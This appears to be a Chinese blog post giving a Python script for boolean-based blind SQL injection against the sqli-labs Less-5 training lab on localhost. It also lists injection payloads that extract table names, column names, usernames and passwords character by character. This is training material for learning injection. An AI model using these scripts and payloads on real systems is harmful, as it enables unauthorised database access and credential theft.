• sqli-labs第5关布尔盲注python脚本


    import requests
    import os
    
    #此函数先判断数据库长度
    def length(url,str):
    	"""Infer the length of the current database name on the sqli-labs page.

    	url -- the lab page URL including the ``id`` parameter (set in main).
    	str -- marker text whose presence in the response body is taken to mean
    	       the injected condition evaluated true.  (The parameter shadows the
    	       builtin ``str`` inside this function.)

    	Counts upward from 1, one HTTP GET per candidate length.  At the first
    	length for which the marker appears it prints the value, calls
    	content() with that length, and returns.
    	"""
    	num = 1
    	# NOTE(review): no upper bound -- if the marker never appears (wrong URL,
    	# changed banner, request blocked) this loop never terminates.
    	while True:
    		str_num = '%d' %num
    		len_url = url + "' and (select length(database()) = " + str_num +")--+"
    		# No timeout is passed, so a stalled server blocks here indefinitely.
    		response = requests.get(len_url)
    		if str in response.text:
    			print("数据库长度为:%s" %str_num)
    			content(url,str,num)
    			break
    		else:
    			num = num + 1
    
    #此函数判断字符串具体的内容
    def content(url,str,num):
    	"""Recover the database name character by character and log it via fwrite().

    	url -- the lab page URL including the ``id`` parameter.
    	str -- marker text whose presence in the response means "condition true".
    	num -- the name length found by length(); positions 1..num are probed.

    	For every position and every candidate in ``s`` one GET is sent; a
    	candidate whose response contains the marker is appended to cache.txt.
    	"""
    	# Candidate alphabet: digits and lowercase letters only.  Uppercase,
    	# underscore and other characters are not covered, so a name containing
    	# them is recorded incompletely (the article notes this below).
    	s = ['1','2','3','4','5','6','7','8','9','0','a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z']
    	con_num = 1
    	while con_num <= num:
    		str_num = '%d' %con_num
    		for i in s:
    			con_url = url + "' and (select mid(database(),"+ str_num +",1)='"+ i +"')--+"
    			# As in length(): no timeout on the request.
    			response = requests.get(con_url)
    			if str in response.text:
    				# The loop does not stop at the first hit, so the remaining
    				# candidates for this position are still requested.
    				fwrite(i)
    		con_num = con_num + 1
    #此函数对字符串的内容做记录并输出
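    def fwrite(i):
    	"""Append the string *i* to ``cache.txt`` in the current directory.

    	The file is opened in append mode, so repeated calls build up the
    	recovered text in order; nothing is ever truncated or overwritten.
    	Uses a context manager so the handle is closed even if write() raises
    	(the original left the file open on error).
    	"""
    	with open("cache.txt", 'a', encoding="utf-8") as fp:
    		fp.write(i)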
    if __name__ == '__main__':
    	# Target is the local sqli-labs training instance (Less-5, boolean-based).
    	url = "http://localhost/sqli-labs/Less-5/?id=1"
    	response = requests.get(url)
    	# Marker printed by the lab page when the query succeeds; its presence or
    	# absence is the single bit every probe below reads.  Shadows builtin str.
    	str = "You are in..........."
    	if str in response.text:
    		length(url,str)
    	else:
    		print("请输入正确的地址")	
    

      初学python,只注重实现功能,不要太在意某些细节,如有建议,感谢提出。

      

    #库中有几个表:

    1' and ((select count(table_name) from information_schema.tables where table_schema = 'security') = 4)--+
    

    #测表名长度:

    1' and (select length((select table_name from information_schema.tables where table_schema = 'security' limit 0,1)) = 10)--+
    

    #爆表名:

    1' and (select mid((select table_name from information_schema.tables where table_schema = 'security' limit 0,1),1,1)='a')--+

    #表中有几列:

    1' and ((select count(column_name) from information_schema.columns where table_name = 'users' and table_schema = 'security') = 3)--+

    #测列名长度:

    1' and (select length((select column_name from information_schema.columns where table_name = 'users' and table_schema = 'security' limit 1,1)) = 8)--+
    

    #爆列名:

    1' and (select mid((select column_name from information_schema.columns where table_name = 'users' and table_schema = 'security' limit 1,1),1,1)='u')--+
    

    #爆用户名:

    1' and (select mid((select username from security.users limit 0,1),1,1)='d')--+
    

    #爆密码:

    1' and (select mid((select password from security.users limit 0,1),1,1)='d')--+
    

     以上标红的就是需要递归测试的地方(标红的地方不显示-.-!,将就看),需要者可自行修改代码。还有上述代码中 s 列表请针对具体的情况修改,因为没有特殊字符以及大写字母等。

  • 原文地址:https://www.cnblogs.com/Spec/p/10648793.html